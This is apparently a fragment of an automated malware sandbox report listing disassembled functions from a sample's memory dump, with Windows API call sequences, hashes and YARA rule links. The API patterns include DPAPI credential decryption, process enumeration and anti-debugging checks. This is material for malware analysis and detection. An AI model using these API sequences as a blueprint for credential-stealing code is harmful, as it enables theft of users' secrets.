Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5

Function 022ACA87 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 022ACABA
lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 022ACAD8
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 022ACAE3
memcpy.MSVCRT(?,?,?), ref: 022ACB79
lstrcat.KERNEL32(?,00420B46), ref: 022ACBAA
lstrcat.KERNEL32(?,00420B47), ref: 022ACBBE
lstrcat.KERNEL32(?,00420B4E), ref: 022ACBDF

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
Instruction ID: 6123371a06c22180a0808d5ef848ee50ce141ec528d5dea75c176415c61602cb
Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
Instruction Fuzzy Hash: B441A07891421AEFDB10DFD0DC88BEEBBB9BB48304F0045A9E609A6280D7755B84CF91

Function 0040C820 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040C853
lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,007500B8), ref: 0040C871
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
memcpy.MSVCRT(?,?,?), ref: 0040C912
lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95

Function 00409AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F

Strings

N@, xrefs: 00409AD4, 00409AE1, 00409AF9, 00409B18, 00409AE4, 00409B1B

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: N@
API String ID: 4291131564-4229412743
Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54

Function 022B7DF7 Relevance: 7.6, APIs: 5, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 022B7E48
LocalAlloc.KERNEL32(00000040,?), ref: 022B7E60
GetKeyboardLayoutList.USER32(?,00000000), ref: 022B7E74
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 022B7EC9
LocalFree.KERNEL32(00000000), ref: 022B7F89

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID:
API String ID: 3090951853-0
Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
Instruction ID: dc3117c1b00049a518d8d80bbcc5b52700ae4c9e16d664208aa9c079b4e4a590
Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
Instruction Fuzzy Hash: 7F414C72960218ABCB25DF94DC89BEDB3B5FF54740F2041D9E109A6294DB742F85CFA0

Function 022BB5A1 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 022BBE09
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 022BBE1E
UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 022BBE29
GetCurrentProcess.KERNEL32(C0000409), ref: 022BBE45
TerminateProcess.KERNEL32(00000000), ref: 022BBE4C

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
Instruction ID: 7155f0865a1ffa6bdebfc2fa48d6c668e4a0e657b5138fa126ed5f19dca6278a
Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
Instruction Fuzzy Hash: 0021C0BC9103059FDB15DF69F8886963BE4FB0A344F50403AE90A872A4EBB05981EF49

Function 0041B33A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041BBA2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
TerminateProcess.KERNEL32(00000000), ref: 0041BBE5

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D

Function 022A74A7 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 022A74B4
RtlAllocateHeap.NTDLL(00000000), ref: 022A74BB
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 022A74E8
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 022A750B
LocalFree.KERNEL32(?), ref: 022A7515

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
Instruction ID: d1cec189e1f6c7341e2a4584e4723bb95380960f4ce4f4daae6e877c620fddbf
Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
Instruction Fuzzy Hash: 890100B5A90208BBEB10DFD4DD45F9DB7B9EB44704F104155FB05AA2C4D6B0AA00CB69

Function 00407240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66

Function 022B9867 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 022B9885
Process32First.KERNEL32(00420ACA,00000128), ref: 022B9899
Process32Next.KERNEL32(00420ACA,00000128), ref: 022B98AE
StrCmpCA.SHLWAPI(?,00000000), ref: 022B98C3
CloseHandle.KERNEL32(00420ACA), ref: 022B98E1

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
Instruction ID: c280027940da205f5e70ed6eb4f662888585d06f7e76965af44365ebbc444848
Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
Instruction Fuzzy Hash: 6001E979A60208FBDB21DFE4C954BEDB7F9EF49740F004189E505A6244D7749A80CF51

Function 00419600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
CloseHandle.KERNEL32(00420ACA), ref: 0041967A

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61

Function 022AE697 Relevance: 6.5, APIs: 4, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9

Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79

Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 022AE709
StrCmpCA.SHLWAPI(?,004214F8), ref: 022AE759
StrCmpCA.SHLWAPI(?,004214FC), ref: 022AE76F
FindNextFileA.KERNEL32(000000FF,?), ref: 022AEE46

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID:
API String ID: 433455689-0
Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
Instruction ID: 21b972ef193ce41a0d215c957a10669f585f82ce09168c9331c819fa25a883c5
Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
Instruction Fuzzy Hash: DB125371A203189BCB1AFBE4DDA5EED733AAF55340F4041ADA10A52198EF346F88CF51

Function 022B9107 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,022A53EB,40000001,00000000,00000000,?,022A53EB), ref: 022B9127

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
Instruction ID: 97673af325b729c2bb9bec190fdb8f72edd1f6bf79ff1e48940ad8b5700f5ce1
Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
Instruction Fuzzy Hash: AE11E274224205FFDB01CF94DC49FA733A9AF89794F009554FA098B264D775E882DF60

Function 00418EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65

Function 022A9D27 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022A5155,00000000,00000000), ref: 022A9D56
LocalAlloc.KERNEL32(00000040,?,?,?,022A5155,00000000,?), ref: 022A9D68
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022A5155,00000000,00000000), ref: 022A9D91
LocalFree.KERNEL32(?,?,?,?,022A5155,00000000,?), ref: 022A9DA6

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
Instruction ID: c46186380d8fb042e3ff58984f99ffdc5c66bb2d2ec026027f415599805bb363
Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
Instruction Fuzzy Hash: A911A4B4240208BFEB10CFA4CC95FAA77B5EB89704F208058FE159B394C776A941CB90

Function 022A9DC7 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 022A9DEB
LocalAlloc.KERNEL32(00000040,00000000), ref: 022A9E0A
memcpy.MSVCRT(?,?,?), ref: 022A9E2D
LocalFree.KERNEL32(?), ref: 022A9E3A

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
Instruction ID: 9d1233fe4626e6f0fc529eb42cac19fd823201f8d19405195ba4c83a6560751b
Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
Instruction Fuzzy Hash: A6110CB8A00209EFDB04CFA4DA85AAE77B5FF89304F104559F91597350D730AE50CF61

Function 00409B60 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
memcpy.MSVCRT(?,?,?), ref: 00409BC6
LocalFree.KERNEL32(?), ref: 00409BD3

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61

Function 00417A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00781438,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00781438,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00781438,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
wsprintfA.USER32 ref: 00417AB7

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55

Function 00413720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID:
API String ID: 123533781-0
Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50

Function 022A092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 022A09DC, 022A09DF, 022A09E4
., xrefs: 022A095F
l, xrefs: 022A0966

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: ea9f522bb3527a43884a08b4ca034a155a17d118f8cad908077d5a37cd01c02f
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
